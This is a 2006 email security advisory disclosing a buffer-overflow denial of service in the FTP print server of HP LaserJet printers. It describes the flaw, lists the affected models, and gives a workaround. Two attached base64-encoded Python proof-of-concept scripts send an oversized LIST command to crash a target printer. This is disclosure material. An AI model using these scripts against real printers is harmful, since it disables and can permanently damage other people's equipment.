|
--=-v5088A+JD/2AZPW+W59q
Content-Type: multipart/mixed; boundary="=-o2iIt2bNlYfdtLUdDYbK"
--=-o2iIt2bNlYfdtLUdDYbK
Content-Type: text/plain; charset=ISO-8859-15
Content-Transfer-Encoding: quoted-printable
HP FTP Printer Server Denial Of Service
---------------------------------------
Author: Joxean Koret
Date: 2006
Location: Basque Country
Affected Software
-----------------
Vendor: Hewlett Packard
Description: HP Printers FTP Server Denial Of Service
Description
-----------
A problem exists in almost any currently used HP Printer with the FTP
Print Server.
Version 2.4 of the FTP Print Server will crash with only one shoot.
Version 2.4.5, which is latest, will need various shoots (the number of
shoots needed is currently unknow).
While playing with my own FTP Fuzzer I tried finding flaws in HP's
Printers. After trying with 5 printers I found the problem in all of
these. The problem is a buffer overflow in the LIST and NLST command. In
version 2.4 a single shoot sending a LIST command with a long string
(about 256 characters) is sufficient enough to test the vulnerability.
Take care trying it because two of my printers were crashed completely
(you will need to make use of your warranty ;] ). Against 2.4 versions
it can crash the complete printer and be unresponsive even after
rebooting it.
In version 2.4.5 (which is the latest) you need to send various times
long shoots to the parameter LIST (a single shoot will not crash,
printer will answer with a "Path too long" message). You will need to
send various times a LIST command with long strings. When trying with
other commands you will see that no problem is raised and the printer
will always be responsive. After a successfull attack you may completely
crash your printer (i.e., calling technical support to fix your crashed
printer).
The problem can be easily triggered by using any FTP fuzzing tool. You
can crash your printer in about 10 second(s) in a LAN.
The printer models I used in my tests are:
* HP LaserJet 5000 Series (firmware R.25.15 / R.25.47)
* HP LaserJet 5100 Series (firmware V.29.12)
Attached goes POCs for the vulnerabilities.
Workaround
----------
Disable the FTP print server as, surely, you aren't using it.
Disclaimer
----------
The information in this advisory and any of its demonstrations is
provided "as is" without any warranty of any kind.
I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.
Contact
-------
Joxean Koret < joxeankoret [at] yah00 [D0T] es >
--
-----------------------------------
Agian, agian, eg=FCn batez
jeikiko dira egiazko Ziberotarrak,
egiazko e=FCskald=FCnak,
tirano arrotzen hiltzeko
eta gure aiten aitek =FCtzi daikien
lurraren pop=FCliari erremetitzeko.
-----------------------------------
--=-o2iIt2bNlYfdtLUdDYbK
Content-Disposition: attachment; filename=dos2.4.5.py
Content-Type: text/x-python; name=dos2.4.5.py; charset=ISO-8859-15
Content-Transfer-Encoding: base64
IyEvdXNyL2Jpbi9weXRob24NCg0KaW1wb3J0IHN5cw0KZnJvbSBmdHBsaWIgaW1wb3J0IEZUUA0K
DQpwcmludCAiSGV3bGV0dC1QYWNrYXJkIEZUUCBQcmludCBTZXJ2ZXIgVmVyc2lvbiAyLjQuNSBC
dWZmZXIgT3ZlcmZsb3cgKFBPQykiDQpwcmludCAiQ29weXJpZ2h0IChjKSBKb3hlYW4gS29yZXQi
DQpwcmludA0KDQppZiBsZW4oc3lzLmFyZ3YpID09IDE6DQogICAgcHJpbnQgIlVzYWdlOiAlcyA8
dGFyZ2V0PiIgJSBzeXMuYXJndlswXQ0KICAgIHN5cy5leGl0KDApDQoNCnRhcmdldCA9IHN5cy5h
cmd2WzFdDQoNCnByaW50ICJbK10gUnVubmluZyBhdHRhY2sgYWdhaW5zdCAiICsgdGFyZ2V0DQoN
CnRyeToNCiAgICBmdHAgPSBGVFAodGFyZ2V0KQ0KZXhjZXB0Og0KICAgIHByaW50ICJbIV0gQ2Fu
J3QgY29ubmVjdCB0byB0YXJnZXQiLCB0YXJnZXQsICIuIiwgc3lzLmV4Y19pbmZvKClbMV0NCiAg
ICBzeXMuZXhpdCgwKQ0KdHJ5Og0KICAgIG1zZyA9IGZ0cC5sb2dpbigpICMgTG9naW4gYW5vbnlt
b3VzbHkNCiAgICBwcmludCBtc2cNCmV4Y2VwdDoNCiAgICBwcmludCAiWyFdIEVycm9yIGxvZ2dp
bmcgYW5vbnltb3VzbHkuIixzeXMuZXhjX2luZm8oKVsxXQ0KICAgIHN5cy5leGl0KDApDQoNCmJ1
ZiA9ICIuL0EiDQppTWF4ID0gOQ0KDQpmb3IgaSBpbiByYW5nZShpTWF4KToNCiAgICBidWYgKz0g
YnVmDQoNCnByaW50ICJbK10gU2VuZGluZyBidWZmZXIgb2YiLGxlbihidWZbMDozMDAwXSksImJ5
dGUocykgLi4uICINCg0KdHJ5Og0KICAgIHByaW50ICJbK10gUGxlYXNlLCBub3RlIHRoYXQgc29t
ZXRpbWVzIHlvdXIgY29ubmVjdGlvbiB3aWxsIG5vdCBiZSBkcm9wcGVkLiAiDQogICAgZnRwLnJl
dHJsaW5lcygiTElTVCAiICsgYnVmWzA6MzAwMF0pDQogICAgcHJpbnQgIlshXSBFeHBsb2l0IGRv
ZXNuJ3Qgd29yayA6KCINCiAgICBwcmludA0KICAgIHN5cy5leGl0KDApDQpleGNlcHQ6DQogICAg
cHJpbnQgIlsrXSBBcHBhcmVudGx5IGV4cGxvaXQgd29ya3MuIFZlcmlmeWluZyAuLi4gIg0KICAg
IHByaW50IHN5cy5leGNfaW5mbygpWzFdDQoNCmZ0cDIgPSBGVFAodGFyZ2V0KQ0KDQp0cnk6DQog
ICAgbXNnID0gZnRwMi5sb2dpbigpDQogICAgcHJpbnQgIlshXSBObywgaXQgZG9lc24ndCB3b3Jr
IDooICINCiAgICBwcmludA0KICAgIHByaW50IG1zZw0KICAgIHN5cy5leGl0KDApDQpleGNlcHQ6
DQogICAgcHJpbnQgIlsrXSBZZXMsIGl0IHdvcmtzLiINCiAgICBwcmludCBzeXMuZXhjX2luZm8o
KVsxXQ0K
--=-o2iIt2bNlYfdtLUdDYbK
Content-Disposition: attachment; filename=dos2.4.py
Content-Type: text/x-python; name=dos2.4.py; charset=ISO-8859-15
Content-Transfer-Encoding: base64
IyEvdXNyL2Jpbi9weXRob24NCg0KaW1wb3J0IHN5cw0KZnJvbSBmdHBsaWIgaW1wb3J0IEZUUA0K
DQpwcmludCAiSGV3bGV0dC1QYWNrYXJkIEZUUCBQcmludCBTZXJ2ZXIgVmVyc2lvbiAyLjQgQnVm
ZmVyIE92ZXJmbG93IChQT0MpIg0KcHJpbnQgIkNvcHlyaWdodCAoYykgSm94ZWFuIEtvcmV0Ig0K
cHJpbnQNCg0KaWYgbGVuKHN5cy5hcmd2KSA9PSAxOg0KICAgIHByaW50ICJVc2FnZTogJXMgPHRh
cmdldD4iICUgc3lzLmFyZ3ZbMF0NCiAgICBzeXMuZXhpdCgwKQ0KDQp0YXJnZXQgPSBzeXMuYXJn
dlsxXQ0KDQpwcmludCAiWytdIFJ1bm5pbmcgYXR0YWNrIGFnYWluc3QgIiArIHRhcmdldA0KDQp0
cnk6DQogICAgZnRwID0gRlRQKHRhcmdldCkNCmV4Y2VwdDoNCiAgICBwcmludCAiWyFdIENhbid0
IGNvbm5lY3QgdG8gdGFyZ2V0IiwgdGFyZ2V0LCAiLiIsIHN5cy5leGNfaW5mbygpWzFdDQogICAg
c3lzLmV4aXQoMCkNCnRyeToNCiAgICBtc2cgPSBmdHAubG9naW4oKSAjIExvZ2luIGFub255bW91
c2x5DQogICAgcHJpbnQgbXNnDQpleGNlcHQ6DQogICAgcHJpbnQgIlshXSBFcnJvciBsb2dnaW5n
IGFub255bW91c2x5LiIsc3lzLmV4Y19pbmZvKClbMV0NCiAgICBzeXMuZXhpdCgwKQ0KDQppTWF4
ID0gNg0KYnVmID0gIi4vQS4iDQoNCmZvciBpIGluIHJhbmdlKGlNYXgpOg0KICAgIGJ1ZiArPSBi
dWYNCg0KcHJpbnQgIlsrXSBTZW5kaW5nIGJ1ZmZlciBvZiIsbGVuKGJ1ZiksImJ5dGUocykgLi4u
ICINCg0KdHJ5Og0KICAgIHByaW50ICJbK10gUGxlYXNlLCBub3RlIHRoYXQgc29tZXRpbWVzIHlv
dXIgY29ubmVjdGlvbiB3aWxsIG5vdCBiZSBkcm9wcGVkLiAiDQogICAgZnRwLnJldHJsaW5lcygi
TElTVCAiICsgYnVmKQ0KICAgIHByaW50ICJbIV0gRXhwbG9pdCBkb2Vzbid0IHdvcmsgOigiDQog
ICAgcHJpbnQNCiAgICBzeXMuZXhpdCgwKQ0KZXhjZXB0Og0KICAgIHByaW50ICJbK10gQXBwYXJl
bnRseSBleHBsb2l0IHdvcmtzLiBWZXJpZnlpbmcgLi4uICINCiAgICBwcmludCBzeXMuZXhjX2lu
Zm8oKVsxXQ0KDQpmdHAyID0gRlRQKHRhcmdldCkNCg0KdHJ5Og0KICAgIG1zZyA9IGZ0cDIubG9n
aW4oKQ0KICAgIHByaW50ICJbIV0gTm8sIGl0IGRvZXNuJ3Qgd29yayA6KCAiDQogICAgcHJpbnQN
CiAgICBwcmludCBtc2cNCiAgICBzeXMuZXhpdCgwKQ0KZXhjZXB0Og0KICAgIHByaW50ICJbK10g
WWVzLCBpdCB3b3Jrcy4iDQogICAgcHJpbnQgc3lzLmV4Y19pbmZvKClbMV0NCg=
--=-o2iIt2bNlYfdtLUdDYbK--
--=-v5088A+JD/2AZPW+W59q
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: Esta parte del mensaje =?ISO-8859-1?Q?est=E1?= firmada
digitalmente
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)
iD8DBQBFiCdwU6rFMEYDrlERAh4QAJ4w/yCIT89pf+5tSnt0YzABP/aWMACgo5vu
I20+sFjA+2BZoAJaRpCvZ8U=IcJ2
-----END PGP SIGNATURE-----
--=-v5088A+JD/2AZPW+W59q--
______________________________________________
LLama Gratis a cualquier PC del Mundo.
Llamadas a fijos y móviles desde 1 céntimo por minuto.
http://es.voice.yahoo.com